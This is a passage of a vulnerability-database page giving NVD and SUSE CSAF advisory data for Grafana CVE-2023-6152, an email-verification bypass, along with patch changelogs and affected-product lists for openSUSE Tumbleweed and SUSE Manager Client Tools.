"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
}
]
}
},
"nvd.nist.gov": {
"cve": {
"descriptions": [
{
"lang": "en",
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
}
],
"id": "CVE-2023-6152",
"lastModified": "2024-02-14T13:59:35.580",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "security@grafana.com",
"type": "Secondary"
}
]
},
"published": "2024-02-13T22:15:45.430",
"references": [
{
"source": "security@grafana.com",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"source": "security@grafana.com",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "security@grafana.com",
"type": "Secondary"
}
]
}
}
}
}
OPENSUSE-SU-2024:13713-1
Vulnerability from csaf_opensuse - Published: 2024-06-15 00:00 - Updated: 2024-06-15 00:00Summary
grafana-10.1.7-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: grafana-10.1.7-1.1 on GA media
Description of the patch: These are all security issues fixed in the grafana-10.1.7-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2024-13713
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.4 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.1.7-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.1.7-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.1.7-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.1.7-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
5 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "grafana-10.1.7-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the grafana-10.1.7-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-13713",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13713-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-6152 page",
"url": "https://www.suse.com/security/cve/CVE-2023-6152/"
}
],
"title": "grafana-10.1.7-1.1 on GA media",
"tracking": {
"current_release_date": "2024-06-15T00:00:00Z",
"generator": {
"date": "2024-06-15T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:13713-1",
"initial_release_date": "2024-06-15T00:00:00Z",
"revision_history": [
{
"date": "2024-06-15T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.1.7-1.1.aarch64",
"product": {
"name": "grafana-10.1.7-1.1.aarch64",
"product_id": "grafana-10.1.7-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.1.7-1.1.ppc64le",
"product": {
"name": "grafana-10.1.7-1.1.ppc64le",
"product_id": "grafana-10.1.7-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.1.7-1.1.s390x",
"product": {
"name": "grafana-10.1.7-1.1.s390x",
"product_id": "grafana-10.1.7-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.1.7-1.1.x86_64",
"product": {
"name": "grafana-10.1.7-1.1.x86_64",
"product_id": "grafana-10.1.7-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.1.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.1.7-1.1.aarch64"
},
"product_reference": "grafana-10.1.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.1.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.1.7-1.1.ppc64le"
},
"product_reference": "grafana-10.1.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.1.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.1.7-1.1.s390x"
},
"product_reference": "grafana-10.1.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.1.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.1.7-1.1.x86_64"
},
"product_reference": "grafana-10.1.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-6152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-6152"
}
],
"notes": [
{
"category": "general",
"text": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:grafana-10.1.7-1.1.aarch64",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.s390x",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-6152",
"url": "https://www.suse.com/security/cve/CVE-2023-6152"
},
{
"category": "external",
"summary": "SUSE Bug 1219912 for CVE-2023-6152",
"url": "https://bugzilla.suse.com/1219912"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:grafana-10.1.7-1.1.aarch64",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.s390x",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:grafana-10.1.7-1.1.aarch64",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.s390x",
"openSUSE Tumbleweed:grafana-10.1.7-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-06-15T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2023-6152"
}
]
}
SUSE-SU-2024:1419-1
Vulnerability from csaf_suse - Published: 2024-04-24 09:04 - Updated: 2024-04-24 09:04Summary
Security Beta update for SUSE Manager Client Tools
Severity
Moderate
Notes
Title of the patch: Security Beta update for SUSE Manager Client Tools
Description of the patch: This update fixes the following issues:
golang-github-prometheus-alertmanager:
- Use %patch -P N instead of deprecated %patchN
golang-github-prometheus-node_exporter:
- Add `device_error` label for filesystem metrics.
- Update rtnetlink library to fix errors during ARP metrics collection.
- Update to 1.7.0 (jsc#PED-7893, jsc#PED-7928):
* [FEATURE] Add ZFS freebsd per dataset stats #2753
* [FEATURE] Add cpu vulnerabilities reporting from sysfs #2721
* [ENHANCEMENT] Parallelize stat calls in Linux filesystem
collector #1772
* [ENHANCEMENT] Add missing linkspeeds to ethtool collector #2711
* [ENHANCEMENT] Add CPU MHz as the value for node_cpu_info metric
#2778
* [ENHANCEMENT] Improve qdisc collector performance #2779
* [ENHANCEMENT] Add include and exclude filter for hwmon
collector #2699
* [ENHANCEMENT] Optionally fetch ARP stats via rtnetlink instead
of procfs #2777
* [BUFFIX] Fix ZFS arcstats on FreeBSD 14.0+ 2754
* [BUGFIX] Fallback to 32-bit stats in netdev #2757
* [BUGFIX] Close btrfs.FS handle after use #2780
* [BUGFIX] Move RO status before error return #2807
* [BUFFIX] Fix promhttp_metric_handler_errors_total being always
active #2808
* [BUGFIX] Fix nfsd v4 index miss #2824
- Update to 1.6.1:
(no source code changes in this release)
- BuildRequire go1.20
- Update to 1.6.0:
* [CHANGE] Fix cpustat when some cpus are offline #2318
* [CHANGE] Remove metrics of offline CPUs in CPU collector #2605
* [CHANGE] Deprecate ntp collector #2603
* [CHANGE] Remove bcache `cache_readaheads_totals` metrics #2583
* [CHANGE] Deprecate supervisord collector #2685
* [FEATURE] Enable uname collector on NetBSD #2559
* [FEATURE] NetBSD support for the meminfo collector #2570
* [FEATURE] NetBSD support for CPU collector #2626
* [FEATURE] Add FreeBSD collector for netisr subsystem #2668
* [FEATURE] Add softirqs collector #2669
* [ENHANCEMENT] Add suspended as a `node_zfs_zpool_state` #2449
* [ENHANCEMENT] Add administrative state of Linux network
interfaces #2515
* [ENHANCEMENT] Log current value of GOMAXPROCS #2537
* [ENHANCEMENT] Add profiler options for perf collector #2542
* [ENHANCEMENT] Allow root path as metrics path #2590
* [ENHANCEMENT] Add cpu frequency governor metrics #2569
* [ENHANCEMENT] Add new landing page #2622
* [ENHANCEMENT] Reduce privileges needed for btrfs device stats #2634
* [ENHANCEMENT] Add ZFS `memory_available_bytes` #2687
* [ENHANCEMENT] Use `SCSI_IDENT_SERIAL` as serial in diskstats #2612
* [ENHANCEMENT] Read missing from netlink netclass attributes from sysfs #2669
* [BUGFIX] perf: fixes for automatically detecting the correct
tracefs mountpoints #2553
* [BUGFIX] Fix `thermal_zone` collector noise @2554
* [BUGFIX] Fix a problem fetching the user wire count on FreeBSD
2584
* [BUGFIX] interrupts: Fix fields on linux aarch64 #2631
* [BUGFIX] Remove metrics of offline CPUs in CPU collector #2605
* [BUGFIX] Fix OpenBSD filesystem collector string parsing #2637
* [BUGFIX] Fix bad reporting of `node_cpu_seconds_total` in
OpenBSD #2663
- Change go_modules archive in _service to use obscpio file
golang-github-prometheus-promu:
- Don't pass -extldflags -static by default
grafana:
- Require Go 1.20
- Update to version 9.5.16:
* [SECURITY] CVE-2023-6152: Add email verification when updating user email (bsc#1219912)
* [BUGFIX] Annotations: Split cleanup into separate queries and
deletes to avoid deadlocks on MySQL
- Update to version 9.5.15:
* [FEATURE] Alerting: Attempt to retry retryable errors
- Update to version 9.5.14:
* [BUGFIX] Alerting: Fix state manager to not keep
datasource_uid and ref_id labels in state after Error
* [BUGFIX] Transformations: Config overrides being lost when
config from query transform is applied
* [BUGFIX] LDAP: Fix enable users on successfull login
- Update to version 9.5.13:
* [BUGFIX] BrowseDashboards: Only remember the most recent
expanded folder
* [BUGFIX] Licensing: Pass func to update env variables when
starting plugin
- Update to version 9.5.12:
* [FEATURE] Azure: Add support for Workload Identity
authentication
- Update to version 9.5.9:
* [FEATURE] SSE: Fix DSNode to not panic when response has empty
response
* [FEATURE] Prometheus: Handle the response with different field
key order
* [BUGFIX] LDAP: Fix user disabling
spacecmd:
- Version 5.0.5-0
* Update translation strings
spacewalk-client-tools:
- Version 5.0.4-0
* Remove rhn-profile-sync rhn_register spacewalk-channel and
spacewalk-update-status
supportutils-plugin-susemanager-client:
- Version 5.0.3-0
* Remove rhnsd from client actions and server backend
uyuni-tools:
- Version 0.1.7-0
* Fix wrong Cobbler spacewalk_authentication_endpoint property after upgrade or migration
* Fix migration script using missing awk in migration image
- Version 0.1.6-0
* Pull image from authenticated registry
* Port 80 should be published to the port 80 of the containers.
8080 is squid
* Autogenerate the database password
* Add mgrctl term command
* Fix --version flag
* Deny uyuni to suma upgrade and viceversa
* Refactor upgrade to clarify script end adding post upgrade
script (bsc#1219887)
* Add mgradm install podman arguments to define big volumes storage
* k8s migration use same functions as upgrade
* Allow to use images from RPM if present
* Schedule a system list refresh after migrate if not runned before
* Ignore error on optional flag
* Fix migration of multiple autoinstallable distributions
* Obsolete uyuni-proxy-systemd-service package by mgrpxy
* Add GitHub workflow for checking changelog
* Allow installation using --image image:tag
* Add command to register Peripheral server to Hub
* Add Node exporter (9100) and Taskomatic (9800) ports to the list
of open TCP ports
* Fix minimal administrator password length
* Do not assume the current host is a cluster node when getting
kubelet version
* Add mgrpxy start, stop and restart commands
* Remove shm size constraints on the server
* Add mgrpxy and mgradm status commands
* Use uninstall commands dry run by default to avoid unintended
removals
* Make first user mandatory at install time
* Add inspect and upgrade command
* Improve error handling when exec.Command is used
* Start/Stop/Restart command with kubernetes
- Version 0.1.5-0
* Install aardvark-dns if netavark is installed (bsc#1220371)
Patchnames: SUSE-2024-1419,SUSE-SLE-Manager-Tools-12-BETA-2024-1419
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.4 (Medium)
Affected products
Recommended
30 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:mgrctl-bash-completion-0.1.7-3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:mgrctl-zsh-completion-0.1.7-3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:python2-spacewalk-check-5.0.4-55.51.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-setup-5.0.4-55.51.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-tools-5.0.4-55.51.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:spacecmd-5.0.5-41.48.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:spacewalk-check-5.0.4-55.51.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:spacewalk-client-setup-5.0.4-55.51.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:spacewalk-client-tools-5.0.4-55.51.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 12-BETA:supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
References
10 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security Beta update for SUSE Manager Client Tools",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\ngolang-github-prometheus-alertmanager:\n\n- Use %patch -P N instead of deprecated %patchN\n\ngolang-github-prometheus-node_exporter:\n\n- Add `device_error` label for filesystem metrics.\n- Update rtnetlink library to fix errors during ARP metrics collection.\n- Update to 1.7.0 (jsc#PED-7893, jsc#PED-7928):\n * [FEATURE] Add ZFS freebsd per dataset stats #2753\n * [FEATURE] Add cpu vulnerabilities reporting from sysfs #2721\n * [ENHANCEMENT] Parallelize stat calls in Linux filesystem\n collector #1772\n * [ENHANCEMENT] Add missing linkspeeds to ethtool collector #2711\n * [ENHANCEMENT] Add CPU MHz as the value for node_cpu_info metric\n #2778\n * [ENHANCEMENT] Improve qdisc collector performance #2779\n * [ENHANCEMENT] Add include and exclude filter for hwmon\n collector #2699\n * [ENHANCEMENT] Optionally fetch ARP stats via rtnetlink instead\n of procfs #2777\n * [BUFFIX] Fix ZFS arcstats on FreeBSD 14.0+ 2754\n * [BUGFIX] Fallback to 32-bit stats in netdev #2757\n * [BUGFIX] Close btrfs.FS handle after use #2780\n * [BUGFIX] Move RO status before error return #2807\n * [BUFFIX] Fix promhttp_metric_handler_errors_total being always\n active #2808\n * [BUGFIX] Fix nfsd v4 index miss #2824\n- Update to 1.6.1:\n (no source code changes in this release)\n- BuildRequire go1.20\n- Update to 1.6.0:\n * [CHANGE] Fix cpustat when some cpus are offline #2318\n * [CHANGE] Remove metrics of offline CPUs in CPU collector #2605\n * [CHANGE] Deprecate ntp collector #2603\n * [CHANGE] Remove bcache `cache_readaheads_totals` metrics #2583\n * [CHANGE] Deprecate supervisord collector #2685\n * [FEATURE] Enable uname collector on NetBSD #2559\n * [FEATURE] NetBSD support for the meminfo collector #2570\n * [FEATURE] NetBSD support for CPU collector #2626\n * [FEATURE] Add FreeBSD collector for netisr subsystem #2668\n * [FEATURE] Add softirqs collector #2669\n * [ENHANCEMENT] Add suspended as a `node_zfs_zpool_state` #2449\n * [ENHANCEMENT] Add administrative state of Linux network\n interfaces #2515\n * [ENHANCEMENT] Log current value of GOMAXPROCS #2537\n * [ENHANCEMENT] Add profiler options for perf collector #2542\n * [ENHANCEMENT] Allow root path as metrics path #2590\n * [ENHANCEMENT] Add cpu frequency governor metrics #2569\n * [ENHANCEMENT] Add new landing page #2622\n * [ENHANCEMENT] Reduce privileges needed for btrfs device stats #2634\n * [ENHANCEMENT] Add ZFS `memory_available_bytes` #2687\n * [ENHANCEMENT] Use `SCSI_IDENT_SERIAL` as serial in diskstats #2612\n * [ENHANCEMENT] Read missing from netlink netclass attributes from sysfs #2669\n * [BUGFIX] perf: fixes for automatically detecting the correct\n tracefs mountpoints #2553\n * [BUGFIX] Fix `thermal_zone` collector noise @2554\n * [BUGFIX] Fix a problem fetching the user wire count on FreeBSD\n 2584\n * [BUGFIX] interrupts: Fix fields on linux aarch64 #2631\n * [BUGFIX] Remove metrics of offline CPUs in CPU collector #2605\n * [BUGFIX] Fix OpenBSD filesystem collector string parsing #2637\n * [BUGFIX] Fix bad reporting of `node_cpu_seconds_total` in\n OpenBSD #2663\n- Change go_modules archive in _service to use obscpio file\n\ngolang-github-prometheus-promu:\n\n- Don\u0027t pass -extldflags -static by default\n\ngrafana:\n\n- Require Go 1.20\n- Update to version 9.5.16:\n * [SECURITY] CVE-2023-6152: Add email verification when updating user email (bsc#1219912)\n * [BUGFIX] Annotations: Split cleanup into separate queries and\n deletes to avoid deadlocks on MySQL\n- Update to version 9.5.15:\n * [FEATURE] Alerting: Attempt to retry retryable errors\n- Update to version 9.5.14:\n * [BUGFIX] Alerting: Fix state manager to not keep\n datasource_uid and ref_id labels in state after Error\n * [BUGFIX] Transformations: Config overrides being lost when\n config from query transform is applied\n * [BUGFIX] LDAP: Fix enable users on successfull login\n- Update to version 9.5.13:\n * [BUGFIX] BrowseDashboards: Only remember the most recent\n expanded folder\n * [BUGFIX] Licensing: Pass func to update env variables when\n starting plugin\n- Update to version 9.5.12:\n * [FEATURE] Azure: Add support for Workload Identity\n authentication\n- Update to version 9.5.9:\n * [FEATURE] SSE: Fix DSNode to not panic when response has empty\n response\n * [FEATURE] Prometheus: Handle the response with different field\n key order\n * [BUGFIX] LDAP: Fix user disabling\n\nspacecmd:\n\n- Version 5.0.5-0\n * Update translation strings\n\nspacewalk-client-tools:\n\n- Version 5.0.4-0\n * Remove rhn-profile-sync rhn_register spacewalk-channel and\n spacewalk-update-status\n\nsupportutils-plugin-susemanager-client:\n\n- Version 5.0.3-0\n * Remove rhnsd from client actions and server backend\n\nuyuni-tools:\n\n- Version 0.1.7-0\n * Fix wrong Cobbler spacewalk_authentication_endpoint property after upgrade or migration\n * Fix migration script using missing awk in migration image\n- Version 0.1.6-0\n * Pull image from authenticated registry\n * Port 80 should be published to the port 80 of the containers.\n 8080 is squid\n * Autogenerate the database password\n * Add mgrctl term command\n * Fix --version flag\n * Deny uyuni to suma upgrade and viceversa\n * Refactor upgrade to clarify script end adding post upgrade\n script (bsc#1219887)\n * Add mgradm install podman arguments to define big volumes storage\n * k8s migration use same functions as upgrade\n * Allow to use images from RPM if present\n * Schedule a system list refresh after migrate if not runned before\n * Ignore error on optional flag\n * Fix migration of multiple autoinstallable distributions\n * Obsolete uyuni-proxy-systemd-service package by mgrpxy\n * Add GitHub workflow for checking changelog\n * Allow installation using --image image:tag\n * Add command to register Peripheral server to Hub\n * Add Node exporter (9100) and Taskomatic (9800) ports to the list\n of open TCP ports\n * Fix minimal administrator password length\n * Do not assume the current host is a cluster node when getting\n kubelet version\n * Add mgrpxy start, stop and restart commands\n * Remove shm size constraints on the server\n * Add mgrpxy and mgradm status commands\n * Use uninstall commands dry run by default to avoid unintended\n removals\n * Make first user mandatory at install time\n * Add inspect and upgrade command\n * Improve error handling when exec.Command is used\n * Start/Stop/Restart command with kubernetes\n- Version 0.1.5-0\n * Install aardvark-dns if netavark is installed (bsc#1220371)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2024-1419,SUSE-SLE-Manager-Tools-12-BETA-2024-1419",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2024_1419-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2024:1419-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20241419-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2024:1419-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2024-April/035086.html"
},
{
"category": "self",
"summary": "SUSE Bug 1219887",
"url": "https://bugzilla.suse.com/1219887"
},
{
"category": "self",
"summary": "SUSE Bug 1219912",
"url": "https://bugzilla.suse.com/1219912"
},
{
"category": "self",
"summary": "SUSE Bug 1220371",
"url": "https://bugzilla.suse.com/1220371"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-6152 page",
"url": "https://www.suse.com/security/cve/CVE-2023-6152/"
}
],
"title": "Security Beta update for SUSE Manager Client Tools",
"tracking": {
"current_release_date": "2024-04-24T09:04:12Z",
"generator": {
"date": "2024-04-24T09:04:12Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2024:1419-1",
"initial_release_date": "2024-04-24T09:04:12Z",
"revision_history": [
{
"date": "2024-04-24T09:04:12Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64",
"product": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64",
"product_id": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64",
"product_id": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.aarch64",
"product": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.aarch64",
"product_id": "golang-github-prometheus-promu-0.14.0-4.15.1.aarch64"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-4.27.1.aarch64",
"product": {
"name": "grafana-9.5.16-4.27.1.aarch64",
"product_id": "grafana-9.5.16-4.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-3.8.1.aarch64",
"product": {
"name": "mgrctl-0.1.7-3.8.1.aarch64",
"product_id": "mgrctl-0.1.7-3.8.1.aarch64"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-3.21.1.aarch64",
"product": {
"name": "uyuni-base-common-5.0.2-3.21.1.aarch64",
"product_id": "uyuni-base-common-5.0.2-3.21.1.aarch64"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-3.21.1.aarch64",
"product": {
"name": "uyuni-base-proxy-5.0.2-3.21.1.aarch64",
"product_id": "uyuni-base-proxy-5.0.2-3.21.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "mgrctl-bash-completion-0.1.7-3.8.1.noarch",
"product": {
"name": "mgrctl-bash-completion-0.1.7-3.8.1.noarch",
